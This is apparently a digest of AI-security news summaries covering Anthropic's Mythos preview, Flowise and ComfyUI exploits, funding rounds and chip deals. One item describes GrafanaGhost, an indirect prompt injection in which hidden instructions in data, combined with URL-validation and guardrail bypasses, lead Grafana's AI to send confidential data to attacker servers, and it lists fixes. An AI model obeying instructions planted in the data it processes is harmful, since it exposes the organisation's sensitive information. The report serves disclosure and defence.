New tools, products, platforms, funding rounds, and company developments in AI security.
Anthropic is launching a new AI model called Claude Mythos Preview as part of Project Glasswing, a cybersecurity partnership with major tech companies like Nvidia, Google, and Microsoft. The model is designed to help large organizations and governments automatically detect vulnerabilities (security weaknesses) in their systems with minimal human involvement. Anthropic is limiting access to launch partners only and not releasing it publicly due to security concerns.
Hackers are actively exploiting CVE-2025-59528, a critical vulnerability in Flowise (an open-source platform for building AI agents and custom LLM applications) that allows arbitrary JavaScript code injection without validation through the CustomMCP node. The flaw was publicly disclosed in September, affects thousands of exposed instances online, and enables attackers to execute commands and access files on vulnerable systems.
At RSAC 2026, cybersecurity leaders discussed how AI should be used in security work, including debates about agentic applications (AI systems that can act independently to solve problems) and whether human involvement can realistically keep up as AI scales up. The discussions highlighted the tension between automating security tasks with AI and maintaining human oversight in important decisions.
AI agents (autonomous systems that learn and adapt to execute workflows without constant human direction) work best when organizations redesign their processes around them rather than adding them to existing systems. Companies need to shift to an 'agent-first' model where AI agents handle routine operations while humans set goals and handle exceptions, requiring machine-readable process definitions and structured data flows to succeed.
Attackers are targeting over 1,000 publicly accessible ComfyUI instances (a platform for running AI image generation) with an automated scanner that exploits a misconfiguration allowing unauthenticated remote code execution (the ability to run commands on a system without permission). Once compromised, these systems are enrolled in botnets (networks of infected computers controlled remotely) to mine cryptocurrency and serve as proxies.
Broadcom, a chip designer, announced new deals to produce AI chips for Google and expanded its partnership with Anthropic (an AI company), causing its stock price to rise 3.7% in premarket trading. The deals include revenue commitments and access to computing capacity, which analysts believe signal strong future demand for custom AI chips and may ease investor concerns about competition.
Modern cybersecurity is shifting from a reactive model (detecting and responding to attacks after they happen) to a proactive model that aims to disrupt attackers before they strike, because attack timelines have collapsed dramatically. Cyber attacks now unfold in seconds rather than hours, with artificial intelligence automating key attack phases, making traditional defense inadequate. In response, both the U.S. government and major tech companies are investing in legal and technical capabilities like litigation, takedowns, and public exposure of tools to impose cost and friction on threat actors across the entire attack ecosystem.
Flowise, an open-source AI platform, has a maximum-severity vulnerability (CVE-2025-59528, CVSS score 10.0) in its CustomMCP node that allows attackers to execute arbitrary JavaScript code on the server without validation, potentially leading to full system compromise and data theft. The flaw requires only an API token to exploit and is being actively exploited in the wild against over 12,000 exposed Flowise instances.
Broadcom has agreed to produce AI chips for Google and signed an expanded deal with Anthropic, giving the AI startup access to about 3.5 gigawatts of computing capacity (the amount of processing power available at one time) using Google's custom processors called TPUs (tensor processing units, which are specialized chips designed to run AI models). This reflects growing demand for the computing infrastructure needed to run generative AI (AI systems that create new text, images, or other content) at scale.
Anthropic released a preview of Mythos, a powerful new AI model, as part of Project Glasswing, a cybersecurity initiative involving over 40 partner organizations like Amazon, Microsoft, and Apple. The model, which was not specifically trained for cybersecurity but has strong coding and reasoning abilities, has reportedly identified thousands of zero-day vulnerabilities (security flaws unknown to the public and software vendors) in software systems during initial testing. The preview is limited to partner organizations for defensive security work and will not be made generally available to the public.
AI is making software creation faster and easier, leading to a future where temporary applications (instant software) might be created and deleted on demand, but this also means AI tools are getting better at both finding and exploiting vulnerabilities (weaknesses in code that attackers can use). While defenders can use the same AI capabilities to patch vulnerabilities and fix security problems, today's AI-generated software tends to contain many security flaws because AI doesn't yet write secure code well.
Fix: Upgrade to Flowise version 3.1.1 or at least version 3.0.6 as soon as possible. Additionally, consider removing Flowise instances from the public internet if external access is not required.
BleepingComputerNation-states are using AI agents (autonomous AI systems that can perform tasks without human intervention) to launch cyberattacks at speeds that traditional security responses cannot match. The article argues that cybersecurity defenses cannot rely on small, gradual improvements but must instead undergo fundamental architectural changes to address this new threat level.
Trent AI, a new startup, has secured $13 million in funding to develop a layered security solution (a multi-level protective system) designed to protect AI agents (software programs that act autonomously to complete tasks) throughout their entire lifecycle, from creation to deployment.
Many enterprises have applications disconnected from centralized identity systems (systems that control who can access what), creating blind spots that AI agents and attackers are actively exploiting. While organizations have invested in IAM (identity and access management, the practice of controlling user access) and Zero Trust security, legacy apps and siloed systems remain outside of centralized control, allowing AI agents to amplify credential risks and bypass security oversight.
GrafanaGhost is a critical vulnerability in Grafana (a data visualization platform) that uses indirect prompt injection (tricking an AI by hiding malicious instructions in data it processes) to steal sensitive enterprise data without requiring user authentication or interaction. Attackers chain together multiple exploits, including bypassing URL validation and AI safety guardrails, to trick Grafana's AI into sending confidential information to attacker-controlled servers.
Fix: Grafana has rolled out a fix for this issue. Additionally, security experts recommend: identifying exposure by checking whether Grafana AI/LLM features are enabled, patching to the latest version, restricting "img-src" (image source permissions) to known domains, and applying egress controls (network rules that limit outbound data traffic).
CSO OnlineOpenAI has published policy proposals suggesting that companies should trial four-day work weeks as AI tools become more capable and potentially displace workers from jobs. The company argues that AI systems will soon complete projects in days that currently take months, and recommends employers offer benefits like reduced work hours without pay cuts, increased retirement contributions, and subsidized childcare to help workers adapt to this shift.
Google has redesigned Gemini's crisis response feature to make it faster for users in distress to access mental health resources. When the chatbot detects a conversation indicating potential suicide or self-harm risk, it now presents a streamlined 'Help is available' module that connects users to crisis resources like suicide hotlines or crisis text lines more quickly.
Fix: Google updated Gemini to streamline its crisis response into a 'one-touch' module (based on the partial text provided, the exact mechanism is not fully detailed in the source). The system detects conversations indicating suicide or self-harm risk and launches the 'Help is available' module to direct users to mental health crisis resources.
The Verge (AI)Multi-tenant SIEM (security information and event management, a platform that collects and analyzes security data from many sources) solutions share physical resources like CPU and memory among different customers, creating a "noisy neighbor" problem where one customer's heavy workload can slow down threat detection for others and violate service promises. While vendors market cloud-based SIEM as efficient and reliable, most don't publicly discuss how they prevent this fairness issue, which requires sophisticated engineering strategies like fair-share scheduling (giving each customer a proportional share of resources) and intelligent queuing rather than simple rate-limiting.
Fix: The vulnerability was addressed in version 3.0.6 of the npm package. Users should upgrade to this version or later.
The Hacker NewsAs AI models become more powerful, they create both greater risks and opportunities for security. CrowdStrike argues that while companies like Anthropic build safer models, organizations also need deployment governance (security controls for how and where AI runs in a company) to protect data and systems when AI agents access databases, workflows, and sensitive information. CrowdStrike offers tools for discovering all AI applications in use, monitoring what data they access, and preventing sensitive information from being exposed through AI workflows.
OpenAI has asked California and Delaware attorneys general to investigate what it calls 'anti-competitive behavior' by Elon Musk, claiming he is working to undermine the company through attacks and coordination with other rivals ahead of an April trial. OpenAI alleges that Musk has conducted opposition research on CEO Sam Altman, spread false allegations, and is using legal efforts to benefit his competing AI company xAI, which faces its own investigations for generating non-consensual explicit deepfake content.